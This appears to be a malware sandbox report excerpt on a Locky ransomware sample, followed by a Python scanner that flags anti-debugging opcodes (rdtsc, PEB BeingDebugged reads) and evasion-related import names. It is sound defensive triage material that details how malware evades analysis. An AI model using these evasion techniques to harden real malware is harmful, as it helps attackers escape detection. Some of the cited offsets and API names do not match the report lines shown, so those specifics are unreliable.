Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_006903EE push dword ptr fs:[00000030h] 0_2_006903EE
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00403A6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00403A6C
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00405F08 SetUnhandledExceptionFilter, 0_2_00405F08
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0041973D SetSecurityDescriptorDacl, 0_2_0041973D
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_004197BD AllocateAndInitializeSid, 0_2_004197BD
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0042E700 GetLocaleInfoA,GetUserDefaultUILanguage, 0_2_0042E700
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00406718 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00406718
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00423053 GetVersionExA, 0_2_00423053
Source: C:\Users\user\Desktop\LockyRansom.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
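The evasion findings above are all visible in raw bytes: rdtsc is 0F 31, push dword ptr fs:[30h] is 64 FF 35 30 00 00 00, the PEB.BeingDebugged read that usually follows is movzx eax, byte ptr [eax+2] (0F B6 40 02), and the API names behind the IsDebuggerPresent and GetUserDefaultLangID checks sit in the import table as clear text. The scanner below is an added example written for this page, not sandbox code: it locates those opcode patterns and import names in a buffer and pairs nearby rdtsc instructions into timing checks. The byte blob it scans is constructed, not taken from LockyRansom.exe, and the 64-byte pairing window is an assumption.

```python
# Opcode sequences behind the report's evasion signatures (32-bit x86).
OPCODE_SIGNATURES = {
    "rdtsc": b"\x0f\x31",
    "push dword ptr fs:[30h] (PEB)": b"\x64\xff\x35\x30\x00\x00\x00",
    "mov eax, fs:[30h] (PEB)": b"\x64\xa1\x30\x00\x00\x00",
    "movzx eax, byte [eax+2] (PEB.BeingDebugged)": b"\x0f\xb6\x40\x02",
}
# Import names that back the API-based checks listed in the report.
API_NAMES = [b"IsDebuggerPresent", b"GetUserDefaultLangID", b"GetModuleFileNameW",
             b"GetTickCount", b"QueryPerformanceCounter", b"ExitProcess"]
TIMING_WINDOW = 64   # assumed: two rdtsc this close are treated as one timing check

# Constructed blob (not bytes from LockyRansom.exe): a timing check, a PEB
# BeingDebugged read, then a fragment of an import name table.
SAMPLE_BLOB = (
    b"\x55\x8b\xec"                    # 0: push ebp; mov ebp, esp
    b"\x0f\x31"                        # 3: rdtsc
    b"\x8b\xd8"                        # 5: mov ebx, eax
    b"\x0f\x31"                        # 7: rdtsc
    b"\x2b\xc3"                        # 9: sub eax, ebx
    b"\x64\xff\x35\x30\x00\x00\x00"    # 11: push dword ptr fs:[30h]
    b"\x58"                            # 18: pop eax
    b"\x0f\xb6\x40\x02"                # 19: movzx eax, byte ptr [eax+2]
    b"\xc3"                            # 23: ret
    + b"\x00" * 16
    + b"KERNEL32.dll\x00IsDebuggerPresent\x00GetUserDefaultLangID\x00ExitProcess\x00"
)


def find_all(buf, pattern):
    """All (possibly overlapping) offsets of pattern in buf."""
    offsets, pos = [], buf.find(pattern)
    while pos != -1:
        offsets.append(pos)
        pos = buf.find(pattern, pos + 1)
    return offsets


def scan_opcodes(buf):
    """Map each signature name to the offsets where it occurs (omitting misses)."""
    hits = {}
    for name, sig in OPCODE_SIGNATURES.items():
        offsets = find_all(buf, sig)
        if offsets:
            hits[name] = offsets
    return hits


def scan_api_names(buf):
    """Evasion-related import names present as clear-text strings."""
    return sorted(n.decode() for n in API_NAMES if buf.find(n) != -1)


def timing_checks(rdtsc_offsets, window=TIMING_WINDOW):
    """Pair consecutive rdtsc offsets that fall within the window."""
    return [(a, b) for a, b in zip(rdtsc_offsets, rdtsc_offsets[1:]) if b - a <= window]


def triage(buf):
    """Summarise anti-debug and evasion indicators in one buffer."""
    ops = scan_opcodes(buf)
    return {
        "opcodes": ops,
        "timing_checks": timing_checks(ops.get("rdtsc", [])),
        "peb_reads": sum(len(v) for k, v in ops.items() if "PEB" in k),
        "apis": scan_api_names(buf),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_BLOB).items():
        print(f"{key}: {value}")
```

Byte-pattern hits can land in data as well as code, so confirm each offset in a disassembler before reporting it. Note that the fs:[30h] reads in this report were found at 0x5C007E and 0x69007E, well outside the 0x400000 image: run the scanner over the unpacked memory dump as well as the file on disk, or the PEB reads will be missed.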